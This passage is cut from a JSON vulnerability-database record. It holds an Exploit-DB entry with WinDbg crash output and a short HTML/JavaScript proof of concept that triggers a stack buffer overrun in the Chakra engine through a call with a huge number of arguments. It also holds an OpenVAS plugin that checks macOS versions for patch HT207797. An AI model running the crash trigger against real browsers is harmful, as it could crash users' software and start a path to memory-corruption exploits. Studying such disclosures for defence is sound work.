0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n0:016> g\r\n\r\nSTATUS_STACK_BUFFER_OVERRUN encountered\r\n(1590.b70): Break instruction exception - code 80000003 (first chance)\r\nKERNELBASE!UnhandledExceptionFilter+0x85960:\r\n00007ffe`9e61c120 cc int 3\r\n0:016> kb\r\nRetAddr : Args to Child : Call Site\r\n00007ffe`811c726a : 00007ffe`814f2820 00007ffe`814f2820 000000d8`b83f9e70 000000d8`b83f9e70 : KERNELBASE!UnhandledExceptionFilter+0x85960\r\n00007ffe`811c73f9 : 00007ffe`00000000 00007ffe`80f50000 00007ffe`8160e2f0 00007ffe`816c6ea4 : chakra!_raise_securityfailure+0x1a\r\n00007ffe`811cac98 : 000100d8`fa7ddce2 00007ffe`a1eb92e2 00007ffe`8102aeac 000000d8`00000000 : chakra!_report_gsfailure+0x169\r\n00007ffe`a1f4a08d : 00000000`00000000 000000d8`b83f8eb0 00000000`00000000 00000000`00000000 : chakra!_GSHandlerCheck_EH+0x38\r\n00007ffe`a1eb9c58 : 00000000`00000000 00000000`00000000 000002aa`8312dc00 00000000`00000000 : ntdll!RtlpExecuteHandlerForException+0xd\r\n00007ffe`a1f4910e : 000002aa`8315fbc0 00007ffe`a1ec9f66 000002aa`98205cbb 000000d8`b83f9538 : ntdll!RtlDispatchException+0x368\r\n00007ffe`8133ba8d : 000002aa`8312a270 000002aa`9820003d 000002aa`8312a270 00000000`00000000 : ntdll!KiUserExceptionDispatcher+0x2e\r\n00007ffe`8120a2a5 : 000000d8`b83f9d20 000002aa`98205cbb 000000d8`b83f9c60 000002aa`98205cbb : chakra!Js::InterpreterStackFrame::ProcessUnprofiledLargeLayoutPrefix+0xd5d\r\n00007ffe`810fa321 : 000000d8`b83f9d20 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x10fec5\r\n00007ffe`8102aeac : 000000d8`b83f9d20 000002aa`96ad0000 000000d8`b83f9ea0 000002aa`8312dc00 : chakra!Js::InterpreterStackFrame::Process+0x1b1\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n00010000`42424242 : 00010000`42424242 00010000`42424242 00010000`42424242 00010000`42424242 : 0x10000`42424242\r\n\r\n\r\n-->\r\n<html>\r\n<head>\r\n<title> POC </title>\r\n</head>\r\n<script>\r\n\r\nvar a = '0x42424242,'.repeat(0xFFFF-2); \r\nvar b = \"function Car(){} var car = new Car(a,\"+a+\"a);\";\r\neval(b);\r\n\r\n</script>\r\n</html>", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/42466/"}], "openvas": [{"lastseen": "2019-03-19T12:29:11", "bulletinFamily": "scanner", "description": "This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.", "modified": "2019-03-18T00:00:00", "published": "2017-05-16T00:00:00", "id": "OPENVAS:1361412562310810984", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310810984", "title": "Apple Mac OS X Multiple Vulnerabilities-01-HT207797", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apple_macosx_mult_vuln01_HT207797.nasl 14295 2019-03-18 20:16:46Z cfischer $\n#\n# Apple Mac OS X Multiple Vulnerabilities-01-HT207797\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.810984\");\n script_version(\"$Revision: 14295 $\");\n script_cve_id(\"CVE-2017-2527\", \"CVE-2017-6990\", \"CVE-2017-6979\", \"CVE-2017-2516\",\n \"CVE-2017-2546\", \"CVE-2017-2512\", \"CVE-2017-2535\", \"CVE-2017-2524\",\n \"CVE-2017-2537\", \"CVE-2017-2541\", \"CVE-2017-2548\", \"CVE-2017-2540\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 21:16:46 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-16 15:41:39 +0530 (Tue, 16 May 2017)\");\n script_name(\"Apple Mac OS X Multiple Vulnerabilities-01-HT207797\");\n\n script_tag(name:\"summary\", value:\"This host is running Apple Mac OS X and\n is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Multiple validation issues due to improper input sanitization.\n\n - Multiple memory corruption issues due to poor memory handling.\n\n - A resource exhaustion issue due to improper input sanitization.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker\n to obtain sensitive information, gain extra privileges, execute arbitrary code,\n and bypass security restrictions.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions 10.11.x through\n 10.11.6, 10.10.x through 10.10.5 and 10.12.x through 10.12.4\");\n\n script_tag(name:\"solution\", value:\"Apply the appropriate security patch from\n the reference links.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207797\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[0-2]\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName)\n exit(0);\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer || osVer !~ \"^10\\.1[0-2]\" || \"Mac OS X\" >!< osName){\n exit(0);\n}\n\n# if 10.11.x before 10.11.6 is running, update to 10.11.6 first and then apply patch\n# if 10.10.x before 10.10.5 is running, update to 10.10.5 first and then apply patch\nif(osVer =~ \"^10\\.1[01]\")\n{\n if(version_in_range(version:osVer, test_version:\"10.11\", test_version2:\"10.11.5\") ||\n version_in_range(version:osVer, test_version:\"10.10\", test_version2:\"10.10.4\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.11.6\" || osVer == \"10.10.5\")\n {\n buildVer = get_kb_item(\"ssh/login/osx_build\");\n ## applying patch on 10.11.6 will upgrade build version to 15G1510\n ## The build version before applying patch on 10.10.5 is 14F2315\n if(buildVer)\n {\n if((osVer == \"10.11.6\" && version_is_less(version:buildVer, test_version:\"15G1510\")) ||\n (osVer == \"10.10.5\" && version_is_less_equal(version:buildVer, test_version:\"14F2315\")))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n }\n}\n\nelse if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.4\")){\n fix = \"10.12.5\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
